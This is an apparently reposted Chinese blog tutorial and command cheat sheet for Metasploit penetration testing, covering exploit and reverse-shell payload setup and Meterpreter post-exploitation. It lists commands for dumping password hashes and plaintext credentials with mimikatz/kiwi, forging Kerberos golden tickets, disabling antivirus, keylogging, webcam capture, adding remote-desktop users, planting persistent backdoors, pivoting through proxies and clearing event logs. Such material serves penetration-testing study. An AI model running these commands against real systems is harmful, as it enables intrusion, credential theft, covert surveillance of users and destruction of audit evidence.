metasploit Framework(msf)里帶數(shù)千個已知的軟件漏洞,并保持持續(xù)更新,Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,采用Ruby語言編寫。黑掉整個宇宙的稱號!??!
初心:? ? 記錄msfconsole的滲透測試流程,以及每個流程點(diǎn)常用到的一些命令,其中還有一些不足的地方大家可以指出來,我會在本博客中添加補(bǔ)充,也會將大家的名字備注在補(bǔ)充的章節(jié)內(nèi)?。? 一起加油? ^-^
本章出后后續(xù)會出實(shí)戰(zhàn)測試,也會將win和linux常用命令做一期更新。
目錄?
kali自帶的msf,升級更新
基本滲透使用流程
攻擊載荷參數(shù)設(shè)置
meterpreter【獲取權(quán)限后的后滲透工具】
meterperter特點(diǎn)【后滲透模塊】
后滲透命令【win主機(jī)系統(tǒng)信息命令】
POST? 后滲透模塊【獲取目標(biāo)主機(jī)控制權(quán)后的滲透攻擊】
后滲透流程【流程常用命令】
使用mimikatx抓取密碼
提權(quán)【win提權(quán)到system】
KiWi模塊使用(msf中集成mimikatz模塊被kiwi取代)
后滲透模塊【主機(jī)安裝應(yīng)用參數(shù)配置】
后滲透模塊【后臺操作設(shè)置】
?建立持續(xù)性后門
MSF搭建socks代理
路由配置
路由參數(shù)說明
?portfwd端口轉(zhuǎn)發(fā)win系統(tǒng)
powershell收集域內(nèi)信息
備注:meterpreter模塊加載命令
kali自帶的msf,升級更新
apt update ? ? ? ? ? ? ? ? ? ? ? ? ? ?更新安裝包信息,只檢查不更新
apt ?upgrade ? ? ? ? ? ? ? ? ? ? ? ? 更新已安裝的軟件包,不刪除舊包
apt ?full-upgrade ? ? ? ? ? ? ? ? ? 升級包,刪除舊包
長時間沒有用kali,會導(dǎo)致數(shù)字簽名會過期,從而導(dǎo)致無法更新源。
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key?add? ? 解決
?
基本滲透使用流程
msfconsole ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 進(jìn)入框架 search ?ms17_010 ? ?
? ? ? ? ? ? ? ? ? ?
search查找相關(guān)的漏洞攻擊模塊 (Auxiliary為輔助探測是否有該漏洞模塊,exploit為漏洞利用模塊)
use ? xxx/xxx/xxx ? ? ? ? ? ? ? ? ? ? ? use選擇攻擊模塊
info ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 使用info查看漏洞類型的信息(針對的系統(tǒng)版本、語言版本)
show payloads ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看此漏洞可以利用的payload
set payload ? xxx/xxx ? ? ? ? ? ? ? ? ? ?設(shè)置攻擊載荷
show options ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看模塊需要配置的參數(shù)
show targets ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看可攻擊的系統(tǒng)平臺(默認(rèn)會自動判斷目標(biāo)操作系統(tǒng)版本和語言)
set ? xxxx ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 設(shè)置參數(shù)
exploit ? ?/ ?run ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?保存/攻擊(如果是探測的話顯示 ?+ 號代表存在該漏洞) 后滲透階段
攻擊載荷參數(shù)設(shè)置
set RHOST 192.168.100.158 ? #設(shè)置RHOST,也就是要攻擊主機(jī)的ip
set LHOST 192.168.100.132 ? #設(shè)置LHOST,也就是我們主機(jī)的ip,用于接收從目標(biāo)機(jī)彈回來的shell
set lport 6666 ? ? ? ? ? ? ?#設(shè)置lport,也就是我們主機(jī)的端口,反彈shell到這個端口;如果我們這里不設(shè)置lport的話,默認(rèn)是4444端口監(jiān)聽;
meterpreter【獲取權(quán)限后的后滲透工具】
meterpreter屬于stage payload,在Metasploit Framework中,Meterpreter屬于一種在運(yùn)行過程中可通過網(wǎng)絡(luò)進(jìn)行功能擴(kuò)展型payload。這種工具基于“內(nèi)存DLL注入”理念實(shí)現(xiàn)的,它能夠通過創(chuàng)建一個新進(jìn)程并調(diào)用注入的DLL來讓目標(biāo)系統(tǒng)運(yùn)行注入的DLL文件。
工作流程:目標(biāo)先要執(zhí)行初始的溢出的漏洞會話連接,可能是bind正向連接,或者反彈revers連接。反彈連接的時候加載dll鏈接文件,同時后臺悄悄處理dll文件。 然后通過meterpreter核心代碼初始化,通過socket套接字建立一個TLS/1.0加密隧道并發(fā)送GET請求給Metasploit服務(wù)端。Metasploit服務(wù)端收到GET請求后配置相應(yīng)的客戶端。 最后,meterpreter加載擴(kuò)展,所有的擴(kuò)展被加載都通過TLS/1.0進(jìn)行數(shù)據(jù)傳輸。
meterperter特點(diǎn)【后滲透模塊】
meterpreter完全駐留在內(nèi)存,沒有寫入磁盤
Meterpreter注入的時候不會產(chǎn)生新的進(jìn)程,并可以很容易的移植到其它正在運(yùn)行的進(jìn)程。 默認(rèn)情況下,mertepreter的通信是加密的,所以很安全
? ? 擴(kuò)展性,許多新的特征模塊可以被加載。 ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?設(shè)置payload時,可以設(shè)置為反向鏈接,可以獲得meterpreter> ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?就可以接著后滲透流程
?? ? ? ? ? 【直接輸入?,可以查看meterpreter中的參數(shù)說明】
background ? ? 【可以把meterpreter掛載到后臺運(yùn)行】
sessions -l ? ? ? 【查看獲得的meterpreter_shell會話列表】
后滲透命令【win主機(jī)系統(tǒng)信息命令】
sysinfo ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)系統(tǒng)信息
run scraper ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)詳細(xì)信息
run hashdump ? ? ? ? ? 導(dǎo)出密碼的哈希
load kiwi ? ? ? ? ? ? ? ? ?加載mimikatz
ps ? ? ? ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)進(jìn)程信息
pwd ? ? ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)當(dāng)前目錄(windows)
getlwd ? ? ? ? ? ? ? ? ? ? 查看目錄當(dāng)前目錄(linux) search -f *.jsp -d e:\ ? ?搜索e盤中所有以.jsp為后綴的文件
download ?e:\test.txt /root ? ? ? ?將目標(biāo)主機(jī)的e:\test.txt文件下載到/root目錄下
upload /root/test.txt ?d:\test ? ? ?將/root/test.txt 上傳到目錄機(jī)的d:\test\目錄
getpid? ? ? ? ? ? ? ? ? ? ? ? ? 查看Meterpreter shell的進(jìn)程PID
migrate 1384? ? ? ? ? ? ? ? 將當(dāng)前Merterpreter shell的進(jìn)程遷移到PID為1384的進(jìn)程上
idletime? ? ? ? ? ? ? ? ? ? ? ? 查看主機(jī)運(yùn)行時間
getuid? ? ? ? ? ? ? ? ? ? ? ? ? 查看獲取的當(dāng)前權(quán)限
getsystem? ? ? ? ? ? ? ? ? ?提權(quán),獲得的當(dāng)前用戶是administrator才能成功
run killav? ? ? ? ? ? ? ? ? ? 關(guān)閉殺毒軟件
screenshot? ? ? ? ? ? ? ? ?截圖
webcam_list? ? ? ? ? ? ? 查看目標(biāo)主機(jī)的攝像頭
webcam_snap ? ? ? ? ?拍照
webcam_stream ? ? ? 開視頻
execute? ? ? ? ? ? ? ? ? ? 參數(shù) -f 可執(zhí)行文件 ? ? ? ? ? ? 執(zhí)行可執(zhí)行程序
run getgui -u testl -p ABC123 ? ? ? ? ? ? ? ? ? 創(chuàng)建testl用戶,密碼為ABC123
run getgui -e ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?開啟遠(yuǎn)程桌面
keyscan_start ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?開啟鍵盤記錄功能
keyscan_dump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 顯示捕捉到的鍵盤記錄信息
keyscan_stop ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 停止鍵盤記錄功能
uictl disable ?keyboard ? ? ? ? ? ? ? ? ? ? ? ? ? ?禁止目標(biāo)使用鍵盤
uictl enable ?keyboard ? ? ? ? ? ? ? ? ? ? ? ? ? ? 允許目標(biāo)使用鍵盤
uictl disable ?mouse ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?禁止目標(biāo)使用鼠標(biāo)
uictl enable ? mouse ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 允許目標(biāo)使用鼠標(biāo)
load ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用擴(kuò)展庫
run ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用擴(kuò)展庫
POST? 后滲透模塊【獲取目標(biāo)主機(jī)控制權(quán)后的滲透攻擊】
manage
run ? post/windows/manage/migrate? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 自動進(jìn)程遷移?
run ? post/windows/manage/killav? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 關(guān)閉殺毒軟件
run? ?post/windows/manage/enable_rdp? ? ? ? ? ? ? ? ? ? ? ? ? ? 開啟遠(yuǎn)程桌面服務(wù)
run ? post/windows/manage/autoroute? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看路由信息
run? post/windows/manage/enable_rdp? USERNAME=SS2 PASSWORD=123456? ? ?
添加遠(yuǎn)程桌面用戶
run? ?post/windows/manage/enable_rdp FORWARD=true? LPORT=6662?
將3389端口轉(zhuǎn)發(fā)到6662
gather
run ? post/windows/gather/enum_logged_on_users? ? ? ? ? ?列舉當(dāng)前登錄的用戶
run ?post/windows/gather/enum_applications? ? ? ? ? ? ? ? ? ? ?列舉應(yīng)用程序
run ?post/windows/gather/credentials/windows_autologin ? ?抓取自動登錄的用戶名和密碼 run ?post/windows/gather/smart_hashdump? ? ? ? ? ? ? ? ? ? ? ? ?dump出所有用戶的hash
run? post/windows/gather/enum_domain? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看域控
run? post/windows/gather/enum_patches? ? ? ? ? ? ? ? ? ? ? ? ? ? ?補(bǔ)丁信息【獲取是否有直接可以利用的msf補(bǔ)丁序號】
run? post/windows/gather/checkvm? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看目標(biāo)主機(jī)是否運(yùn)行在虛擬機(jī)上
? ?后滲透流程【流程常用命令】
sysinfo? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看目標(biāo)主機(jī)的信息
run? ?post/windows/gather/checkvm? ? ? ? ? ? ? ?查看主機(jī)是否運(yùn)行在虛擬機(jī)上
run killav? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?關(guān)閉掉目標(biāo)主機(jī)殺毒軟件
run scraper? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?獲取目標(biāo)主機(jī)的詳細(xì)信息 訪問文件系統(tǒng)
pwd? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看當(dāng)前目錄
cat? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?讀取文件內(nèi)容
rm? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?刪除文件
edit? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用vim編輯文件
mkdir? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 新建目錄
rmdir? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?刪除目錄
download ? file (文件)? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?幫助從目標(biāo)系統(tǒng)中下載文件
duload ?file(文件)? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 向目標(biāo)系統(tǒng)上傳文件
getuid? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?命令可以獲取當(dāng)前用戶的信息
getsystem? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?自動提權(quán)為系統(tǒng)權(quán)限
使用mimikatx抓取密碼
run windows/gather/credentials/windows_autologin ? ? 抓取自動登錄的用戶名和密碼
run ?hashdump ? ? ? ? ? ? ?導(dǎo)出密碼哈希 導(dǎo)出格式: ? ?用戶名:SID:LM哈希:NTLM哈希:::
run windows/gather/smart_hashdump? ? ? ? ? ? ? ? ?命令的使用需要系統(tǒng)權(quán)限
前提:執(zhí)行mimikatz必須System權(quán)限,并且執(zhí)行時,要根據(jù)當(dāng)前的系統(tǒng)位數(shù)進(jìn)行選擇
首先查看當(dāng)前會話的權(quán)限(getuid),然后看系統(tǒng)位數(shù)(sysinfo),(upload )上傳文件絕對路徑,execute -i -f mimikatz.exe(執(zhí)行)? ?【注:mimikatz必須使用system權(quán)限】
抓取密碼: privilege::debug
? ? ? ? ? ? ? ? ? ?sekurlsa::logonpasswords
提權(quán)【win提權(quán)到system】
一、當(dāng)前權(quán)限是administrator用戶
二、利用其它手段先提權(quán)到admininistrator用戶,然后administrator用戶可以直接在meterpreter_shell使用命令getsystem提權(quán)到system權(quán)限。
? ? ? ?
getuid? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看當(dāng)前會話用戶身份
getsystem? ? ? ? ? ? ? ? ? ? ? ? ? ?嘗試自動提權(quán)
KiWi模塊使用(msf中集成mimikatz模塊被kiwi取代)
msf中集成的mimikatz模塊已經(jīng)被kiwi取代 ? ? ? ? ? ?
? ? ? ? ?前提:提權(quán)到system權(quán)限,kiwi默認(rèn)加載是32位。 如果目標(biāo)主機(jī)是64位系統(tǒng),澤必須先看系統(tǒng)進(jìn)程列表,然后將meterpreter進(jìn)程遷移到一個64位程序的進(jìn)程中,才能加載kiwi并查看系統(tǒng)明文。? ? ? ? ?
sysinfo? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看系統(tǒng)的?
ps? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看是否有64位進(jìn)程
migrate ?PID? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?進(jìn)程遷移到Pid上
kiwi_cmd ? sekurlsa::logonpasswords? ? ? 可以使用mimikatz的全部功能
ps? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看進(jìn)程
load ?kiwi? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 加載kiwi模塊
help ?kiwi? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看kiwi模塊
creds_all? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有1憑據(jù),可以列舉系統(tǒng)中的明文密碼
creds_kerberos? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有kerberos憑據(jù)
creds_msv? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列舉所有msv憑據(jù)
creds_ssp? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列舉所有ssp憑據(jù)
creds_tspkg? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有tspkg憑據(jù)
creds_wdigest? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有wdigest憑據(jù)
dcsync? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?通過dcsync檢索用戶賬戶信息
dcsync_ntlm? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?通過dcsync檢索用戶賬戶NTM散列、SID和RID
golden_ticket_create ? ? ? ? ? ? ? ? ? ? 創(chuàng)建黃金票據(jù)
kerberos_ticket_list ? ? ? ? ? ? ? ? ? ? ? 列舉kerberos票據(jù)
kerberos_ticket_purge ? ? ? ? ? ? ? ? ?清除kerberos票據(jù)
kerberos_ticket_use? ? ? ? ? ? ? ? ? ? ? 使用kerberos票據(jù)
kiwi_cmd? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?執(zhí)行mimikatz的命令,后面接mimikatz.exe命令 lsa_dump_sam? ? ? ? ? ? ? ? ? ? ? ? ? ? ? dump出lsa的SAM
lsa_dump_secrets? ? ? ? ? ? ? ? ? ? ? ? ? dump出lsa的密文
password_change? ? ? ? ? ? ? ? ? ? ? ? ? 修改密碼
wifi_list? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列出當(dāng)前用戶的wifi配置文件
wifi_list_shared? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列出共享wifi配置文件/編碼
后滲透模塊【主機(jī)安裝應(yīng)用參數(shù)配置】
run post/windows/gathtier/enum_applications? ? ? ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)安裝哪些應(yīng)用
execute ? + [參數(shù)]
-f ? 偽造的線程令牌運(yùn)指定可執(zhí)行文件
-H ?創(chuàng)建一個隱藏進(jìn)程
-a ? 傳遞給命令的參數(shù)
-i ? ?跟進(jìn)程進(jìn)行交互
-m ? 從內(nèi)存中執(zhí)行
-t ? ?使用當(dāng)前行進(jìn)程
-s ? 在給定會話執(zhí)行進(jìn)程
screenshot? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?截圖目標(biāo)主機(jī)屏幕
run ?post/windows/gather/enum_logged_on_users ? ? ? ? 查看目標(biāo)主機(jī)有用戶
創(chuàng)建賬戶:
方式一: run ?getgui ?-u ?用戶名 -p ?密碼
方式二: run post/windows/manage/enable_rdp ?username=xxx password=xxxx
啟用遠(yuǎn)程桌面:
idletime? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢查遠(yuǎn)程用戶的空閑時長
run ?post/windows/manage/enable_rdp? ? ? ? ? ? ? ? ? ? ? ? ? 開啟遠(yuǎn)程桌面
run ?post/windows/manage/enable_rdp? FORWARD=true LPORT=6662? ? ?將3389端口轉(zhuǎn)發(fā)到6662端口
后滲透模塊【后臺操作設(shè)置】
?鍵盤記錄:
keyscan_start? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?開啟鍵盤記錄功能
keyscan_dump? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?顯示捕捉到的鍵盤記錄信息
keyscan_stop? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?停止鍵盤記錄功能
禁止目標(biāo)主機(jī)使用鍵盤鼠標(biāo):
uictl ?disable(enable) ?keyboard? ? ? ? ? ?禁止允許目標(biāo)使用鍵盤
uictl ? disable(enable) ?mouse? ? ? ? ?禁止目標(biāo)使用鼠標(biāo)
目標(biāo)主機(jī)攝像頭拍照:
webcam_list? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?獲取目標(biāo)系統(tǒng)的攝像頭列表
webcam_snap? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?從指定的攝像頭,拍攝照片
webcam_stream? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 從指定的攝像頭,開啟視頻
load/use? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 加載模塊
load ?-l? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列出所有可用的擴(kuò)展
load -help? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 幫助;
說明 生成后門木馬,然后放到windows的啟動目錄中: C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
服務(wù)啟動: ? run ?exploit/windows/local/peristence lhost=192.168.100.132 ?lport=xxx
進(jìn)程連接192.168.100.132:8888 ?【缺點(diǎn)容易被殺毒】
netstat ?-ano : findstr “8888”
?建立持續(xù)性后門
meterpreter模塊基于內(nèi)存DLL建立的連接,需要在目標(biāo)系統(tǒng)內(nèi)部留下一個持續(xù)性的后門。
兩種方式:
? ? ? ? 一種通過啟動項(xiàng)啟動(persistence),
? ? ? ? 第二種服務(wù)啟動(metsvc)
啟動項(xiàng):
首先要生成一個后門木馬,然后放入windows的啟動目錄中,只要開機(jī)就可以啟動連接對應(yīng)端口。
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
服務(wù)啟動:
run exploit/windows/local/persistence lhost=192.168.100.132 lport=8888 ? ? ? ?
#會自動連接192.168.100.132的8888端口,缺點(diǎn)是容易被殺毒軟件查殺
MSF搭建socks代理
msf中有三個代理模塊 socks4a ?、 socks5 ?、 socks_unc socks5可以設(shè)置用戶名和密碼,但有時候msf不會監(jiān)聽端口,可能導(dǎo)致代理失敗 use ?auxiliary/server/socks ? ? 使用該模塊 這里socks模塊只是將代理設(shè)置為監(jiān)聽(默認(rèn)為1080),即通過proxychains的流量都轉(zhuǎn)給本地的1080端口,又因?yàn)檫@是MSF起的監(jiān)聽端口,所以通過代理走的流程也都能達(dá)到內(nèi)網(wǎng)。
代理設(shè)置:
msf中將模塊改為 ? ?use ?auxiliary/server/socks_proxy
show options ? ? ? ? ? ? ? ?查看模塊詳情 設(shè)置sock監(jiān)聽的接口IP和端口 ? ? ? ? ?
set ?SRVHOST ?ip(127.0.0.1) ?&& set ?SRVPORT ? 端口
socks4a代理設(shè)置:
use ? auxiliary/server/socks4a
set ?SRVHOST ? ? 0.0.0.0
set ?SRVPORT ? ? 1080 run
socks5代理設(shè)置:
use ? auxiliary/server/socks5
set ?SRVHOST ? ? 0.0.0.0
set ?SRVPORT ? ? 1080
set ? USERNAME ? root
set ? PASSWORD Password@
run
連接代理:
編輯本地proxychains程序配置文件 vim ?/etc/proxychains.conf 瀏覽器也需要設(shè)置代理,直接通過瀏覽器就可以訪問內(nèi)網(wǎng),找到ProxyList
[ProxyList]
中添加socks5 0.0.0.0 1080? root? password? ? 【1080為監(jiān)聽端口】
用nmap測試程序時,必須使用proxychains4?nma?-sT -Pn ?xxxx ?才可以
路由配置
?【使用代理前添加路由】
先添加路由讓MSF能達(dá)到目標(biāo)機(jī)器內(nèi)網(wǎng)。
route add 209.98.32.33 mask 255.255.255.224 ?202.96.123.3 ?metric 5 ? ?執(zhí)行命令添加路由
route print ? ? ? ? ? ?打印路由的Destination ? ? ? ?
route delete ?209.98.32.33 ? 刪除路由
route change 209.98.32.33 netmask 255.255.255.224 ?202.96.123.3 ?metric 5【修改209.98.32.33網(wǎng)關(guān)修改為202.96.132.3】
路由轉(zhuǎn)發(fā):
方式一:
route ? ? ? ? ? ? ? ? ? ? ? ? 查看網(wǎng)段信息
background ? ? ? ? ? ? ? 將目前進(jìn)程掛到后臺,回到msf
route add 172.16.10..0 255.255.255.0 ?1 ? ?添加路由(1是掛起session編號)
route ?print ? ? ? ? ? ? ? ?
查看路由信息
方式二: use ? post/multi/manage/autoroute
set ? session 1 exploit ? ? ? 【直接加載這個模塊,調(diào)用session】
缺點(diǎn): 通過這種方式做代理轉(zhuǎn)發(fā),只能是msf使用,其它的應(yīng)用無法使用,其它應(yīng)用使用需要增加sock代理。
路由參數(shù)說明
?add? ? ? ? ? ? ? ? ? ? ?增加路由記錄 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?del? ? ? ? ? ? ? ? ? ? ? 刪除路由記錄
target? ? ? ? ? ? ? ? ? ?目的網(wǎng)絡(luò)或目的主機(jī) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
gw? ? ? ? ? ? ? ? ? ? ? ?設(shè)置默認(rèn)網(wǎng)關(guān)
mss? ? ? ? ? ? ? ? ? ? ?設(shè)置TCP的最大區(qū)塊長度,單位MB ? ? ? ? ? ?
windows? ? ? ? ? ? ? 指定通過路由表的TCP連接的TCP窗口大小
dev? ? ? ? ? ? ? ? ? ? ? 路由記錄所表示的網(wǎng)絡(luò)接口
netmask? ? ? ? ? ? ? 設(shè)置掩碼長度 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
-A? ? ? ? ? ? ? ? ? ? ? ? 設(shè)置地址類型 ? ? ?
-c? ? ? ? ? ? ? ? ? ? ? ? ?打印Linux內(nèi)核的路由緩存 ?
-v? ? ? ? ? ? ? ? ? ? ? ? ? 顯示詳細(xì)信息 ? ? ?
?-n? ? ? ? ? ? ? ? ? ? ? ?不執(zhí)行DNS反向查找,直接顯示數(shù)字形式的IP地址
-e? ? ? ? ? ? ? ? ? ? ? ? netstart格式顯示路由表 ? ? ? ?
?-net? ? ? ? ? ? ? ? ? ? 到一個網(wǎng)絡(luò)的路由表
-host? ? ? ? ? ? ? ? ? ?到一個主機(jī)的路由表
?portfwd端口轉(zhuǎn)發(fā)win系統(tǒng)
portfwd add -l 9999 -r 192.168.100.158 -p 3389 ? ? ?? ??? ?
#將192.168.11.13的3389端口轉(zhuǎn)發(fā)到本地的9999端口上,這里的192.168.100.158是獲取權(quán)
限的主機(jī)的ip地址
portfwd ?add -l ?9999 -r 192.168.100.158 -p 3389 ? ?
-l ? ? ? ?本地監(jiān)聽端口
-p ? ? ? 目標(biāo)服務(wù)器端口
add ? ? 添加一個連接
將目標(biāo)端口轉(zhuǎn)發(fā)到本地監(jiān)聽端口,用于接收目標(biāo)主機(jī)的端口反彈
rdesktop ? ? ? ?127.0.0.1:9999 ? ? ?訪問本地9999端口即可連接到目標(biāo)主機(jī)的3389端口
clearev ? ? ? ? ? ? ? ? ? ? ? #清除日志
powershell收集域內(nèi)信息
load ?powershell? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?加載powershell功能
powershell_import ?/root/PowerView.ps1 ? ? ? ? ? ? ? 導(dǎo)入powershell腳本,提前將該powershell腳本放到指定目標(biāo)
powershell_execute ?Get-NetDomain? ? ? ? ? ? ? ? ? ? 該模塊獲取域信息
powershell_execute Invoke-UserHunter? ? ? ? ? ? ? ?該功能模塊用于定位域管理員登錄的主機(jī) powershell_execute Get-NetForest? ? ? ? ? ? ? ? ? ? ? 該模塊用于定位域信息 powershell_execute Invoke-EnumerateLocalAdmin? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
枚舉域中所有計(jì)算機(jī)上本地管理員組的成員
備注:meterpreter模塊加載命令
meterpreter模塊命令不齊全,可以執(zhí)行load?lstdapi加載補(bǔ)全命令
有時候后滲透收到的不是meterperpreter類型的session,可以用sessions -u id 來升級session。執(zhí)行該命令,默認(rèn)調(diào)用的是? /post/multi/manage/shell_to_meterpreter.文章來源:http://www.zghlxwxcb.cn/news/detail-808069.html
sessions -u? ?id? ? 中的 id 為載荷id文章來源地址http://www.zghlxwxcb.cn/news/detail-808069.html
到了這里,關(guān)于metasploit(MSF)滲透超細(xì)解說 -- 小黑滲透工具的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!